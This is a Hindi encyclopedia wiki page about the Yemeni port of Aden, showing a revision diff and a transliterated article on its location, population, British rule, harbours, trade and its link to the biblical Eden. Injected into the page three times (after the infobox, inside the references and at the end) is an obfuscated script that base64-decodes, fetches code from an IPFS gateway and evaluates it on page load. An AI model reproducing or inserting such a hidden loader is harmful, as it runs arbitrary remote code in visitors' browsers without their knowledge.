Difference between revisions of "अदन"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''अदन''' यमन गणराज्य का एक बंदरगाह है। यह लाल सागर की '[...' के साथ नया पन्ना बनाया)
 
 
(4 intermediate revisions by 2 users not shown)
Line 1: Line 1:
'''अदन''' यमन गणराज्य का एक बंदरगाह है। यह [[लाल सागर]] की '[[अदन की खाड़ी]]' पर 'बाब अल-मन्देब' जलसन्धि से लगभग 170 कि.मी. पूर्व में स्थित है। यह देश का सबसे महत्त्वपूर्ण आर्थिक केंद्र और बंदरगाह है। अदन बंदरगाह एक [[शांत ज्वालामुखी]] के क्रेटर में स्थित है।<ref>{{cite web |url= http://khoj.bharatdiscovery.org/india/%E0%A4%85%E0%A4%A6%E0%A4%A8|title= अदन|accessmonthday=14 सितम्बर|accessyear= 2014|last= |first= |authorlink= |format= |publisher= भारतखोज|language= हिन्दी}}</ref>
+
{{सूचना बक्सा संक्षिप्त परिचय
 +
|चित्र=Aden-Yemen.jpg
 +
|चित्र का नाम=अदन, यमन गणराज्य
 +
|विवरण='अदन' एक प्रमुख बंदरगाह है, जो यमन गणराज्य में स्थित है। यह एक [[शांत ज्वालामुखी]] के क्रेटर में स्थित है।
 +
|शीर्षक 1=गणराज्य
 +
|पाठ 1=यमन
 +
|शीर्षक 2=जनसंख्या
 +
|पाठ 2=लगभग दस लाख ([[2009]])
 +
|शीर्षक 3=मुख्य भाषा
 +
|पाठ 3=[[अरबी भाषा|अरबी]]
 +
|शीर्षक 4=
 +
|पाठ 4=
 +
|शीर्षक 5=
 +
|पाठ 5=
 +
|शीर्षक 6=
 +
|पाठ 6=
 +
|शीर्षक 7=
 +
|पाठ 7=
 +
|शीर्षक 8=
 +
|पाठ 8=
 +
|शीर्षक 9=निर्देशांक
 +
|पाठ 9=12°48′ उत्तरी अक्षांश तथा 45°02′ पूर्वी देशांतर
 +
|शीर्षक 10=मुख्य उत्पादित वस्तुएँ
 +
|पाठ 10=सिगरेट तथा [[नमक]]
 +
|संबंधित लेख=[[अदन की खाड़ी]]
 +
|अन्य जानकारी=[[ईसाई]], [[मुसलमान]] और [[यहूदी]] मत के अनुसार अदन स्वर्ग का वह उपवन है, जहाँ ईश्वर ने 'आदम' को बनाकर रखा था।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=
 +
}}
 +
'''अदन''' यमन गणराज्य का एक बंदरगाह है। यह [[लाल सागर]] की '[[अदन की खाड़ी]]' पर 'बाब अल-मन्देब' जलसन्धि से लगभग 170 कि.मी. पूर्व में स्थित है। यह देश का सबसे महत्त्वपूर्ण आर्थिक केंद्र और बंदरगाह है। अदन बंदरगाह एक [[शांत ज्वालामुखी]] के क्रेटर में स्थित है।<ref>{{cite web |url= http://bharatkhoj.org/india/%E0%A4%85%E0%A4%A6%E0%A4%A8|title= अदन|accessmonthday=14 सितम्बर|accessyear= 2014|last= |first= |authorlink= |format= |publisher= भारतखोज|language= हिन्दी}}</ref>
  
*अदन 12° 45 उत्तरी अक्षांश तथा 45° 4 पूर्वी देशांतर पर स्थित है। यहाँ लगभग दस लाख लोग रहते हैं।
+
*अदन 12°48′ उत्तरी अक्षांश तथा 45°02′ पूर्वी देशांतर पर स्थित है। यहाँ लगभग दस लाख लोग रहते हैं।
 
*1839 से [[1967]] के काल में यहाँ ब्रिटिश क़ब्ज़ा रहा और इस दौरान [[1937]] तक इसे ब्रिटिश भारत का हिस्सा माना जाता था।
 
*1839 से [[1967]] के काल में यहाँ ब्रिटिश क़ब्ज़ा रहा और इस दौरान [[1937]] तक इसे ब्रिटिश भारत का हिस्सा माना जाता था।
 
*यह करमुक्त बंदरगाह<ref>फ्रीफोर्ट</ref> है। जलवायु गरम तथा वार्षिक [[वर्षा]] दो इंच मात्र होती है।
 
*यह करमुक्त बंदरगाह<ref>फ्रीफोर्ट</ref> है। जलवायु गरम तथा वार्षिक [[वर्षा]] दो इंच मात्र होती है।
 
*यहाँ पर दो बंदरगाह हैं- एक बाह्य, जो नगर की ओर मुखांकित और सिरिह द्वीप से सुरक्षित है तथा तूसरा आंतरिक, जो अदन बैक बे या अरबों द्वारा बंदर तबाइह कहलाता है।
 
*यहाँ पर दो बंदरगाह हैं- एक बाह्य, जो नगर की ओर मुखांकित और सिरिह द्वीप से सुरक्षित है तथा तूसरा आंतरिक, जो अदन बैक बे या अरबों द्वारा बंदर तबाइह कहलाता है।
 
*सन [[1868]] में स्वेज नहर के बन जाने से अदन एक प्रसिद्ध व्यापारिक केंद्र बन गया है। यह जहाजों के [[कोयला]] तथा तेल लेने के लिए ठहरने का प्रमुख स्थान भी है।
 
*सन [[1868]] में स्वेज नहर के बन जाने से अदन एक प्रसिद्ध व्यापारिक केंद्र बन गया है। यह जहाजों के [[कोयला]] तथा तेल लेने के लिए ठहरने का प्रमुख स्थान भी है।
*अदन सिगरेट तथा [[नमक]] उत्पन्न करता है।
+
*अदन मुख्य रूप से सिगरेट तथा [[नमक]] उत्पन्न करता है।
*[[यहूदी]], [[ईसाई]] और [[मुसलमान]] मत के अनुसार अदन स्वर्ग का वह उपवन है, जहाँ ईश्वर ने 'आदम' को बनाकर रखा था।
+
*[[यहूदी]], [[ईसाई]] और [[मुसलमान]] मत के अनुसार अदन स्वर्ग का वह उपवन है, जहाँ ईश्वर ने 'आदम' को बनाकर रखा था।<ref>{{cite book | last =शर्मा | first =राणाप्रसाद| title =पौराणिक कोश| edition = | publisher =ज्ञान मंडल लिमिटेड| location = वाराणसी | language =हिंदी | pages =562| chapter =}}</ref>
 +
 
  
  
Line 17: Line 47:
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{विदेशी स्थान}}
 
{{विदेशी स्थान}}
[[Category:विदेशी स्थान]][[Category:विदेशी नगर]][[Category:भूगोल कोश]][[Category:हिन्दी विश्वकोश]]
+
[[Category:विदेशी स्थान]][[Category:विदेशी नगर]][[Category:भूगोल कोश]][[Category:ईसाई धर्म कोश]][[Category:इस्लाम धर्म कोश]][[Category:इस्लाम धर्म शब्दावली]][[Category:हिन्दी विश्वकोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 11:31, 8 May 2018

adan
vivaran 'adan' ek pramukh bandaragah hai, jo yaman ganarajy mean sthit hai. yah ek shaant jvalamukhi ke kretar mean sthit hai.
ganarajy yaman
janasankhya lagabhag das lakh (2009)
mukhy bhasha arabi
nirdeshaank 12°48′ uttari akshaansh tatha 45°02′ poorvi deshaantar
mukhy utpadit vastuean sigaret tatha namak
sanbandhit lekh adan ki kha di
any janakari eesaee, musalaman aur yahoodi mat ke anusar adan svarg ka vah upavan hai, jahaan eeshvar ne 'adam' ko banakar rakha tha.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

adan yaman ganarajy ka ek bandaragah hai. yah lal sagar ki 'adan ki kha di' par 'bab al-mandeb' jalasandhi se lagabhag 170 ki.mi. poorv mean sthit hai. yah desh ka sabase mahattvapoorn arthik keandr aur bandaragah hai. adan bandaragah ek shaant jvalamukhi ke kretar mean sthit hai.[1]

  • adan 12°48′ uttari akshaansh tatha 45°02′ poorvi deshaantar par sthit hai. yahaan lagabhag das lakh log rahate haian.
  • 1839 se 1967 ke kal mean yahaan british qabza raha aur is dauran 1937 tak ise british bharat ka hissa mana jata tha.
  • yah karamukt bandaragah[2] hai. jalavayu garam tatha varshik varsha do ianch matr hoti hai.
  • yahaan par do bandaragah haian- ek bahy, jo nagar ki or mukhaankit aur sirih dvip se surakshit hai tatha toosara aantarik, jo adan baik be ya araboan dvara bandar tabaih kahalata hai.
  • san 1868 mean svej nahar ke ban jane se adan ek prasiddh vyaparik keandr ban gaya hai. yah jahajoan ke koyala tatha tel lene ke lie thaharane ka pramukh sthan bhi hai.
  • adan mukhy roop se sigaret tatha namak utpann karata hai.
  • yahoodi, eesaee aur musalaman mat ke anusar adan svarg ka vah upavan hai, jahaan eeshvar ne 'adam' ko banakar rakha tha.[3]


  1. REDIRECTsaancha:inhean bhi dekhean


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. adan (hindi) bharatakhoj. abhigaman tithi: 14 sitambar, 2014.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
  2. phriphort
  3. sharma, ranaprasad pauranik kosh (hiandi). varanasi: jnan mandal limited, 562.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>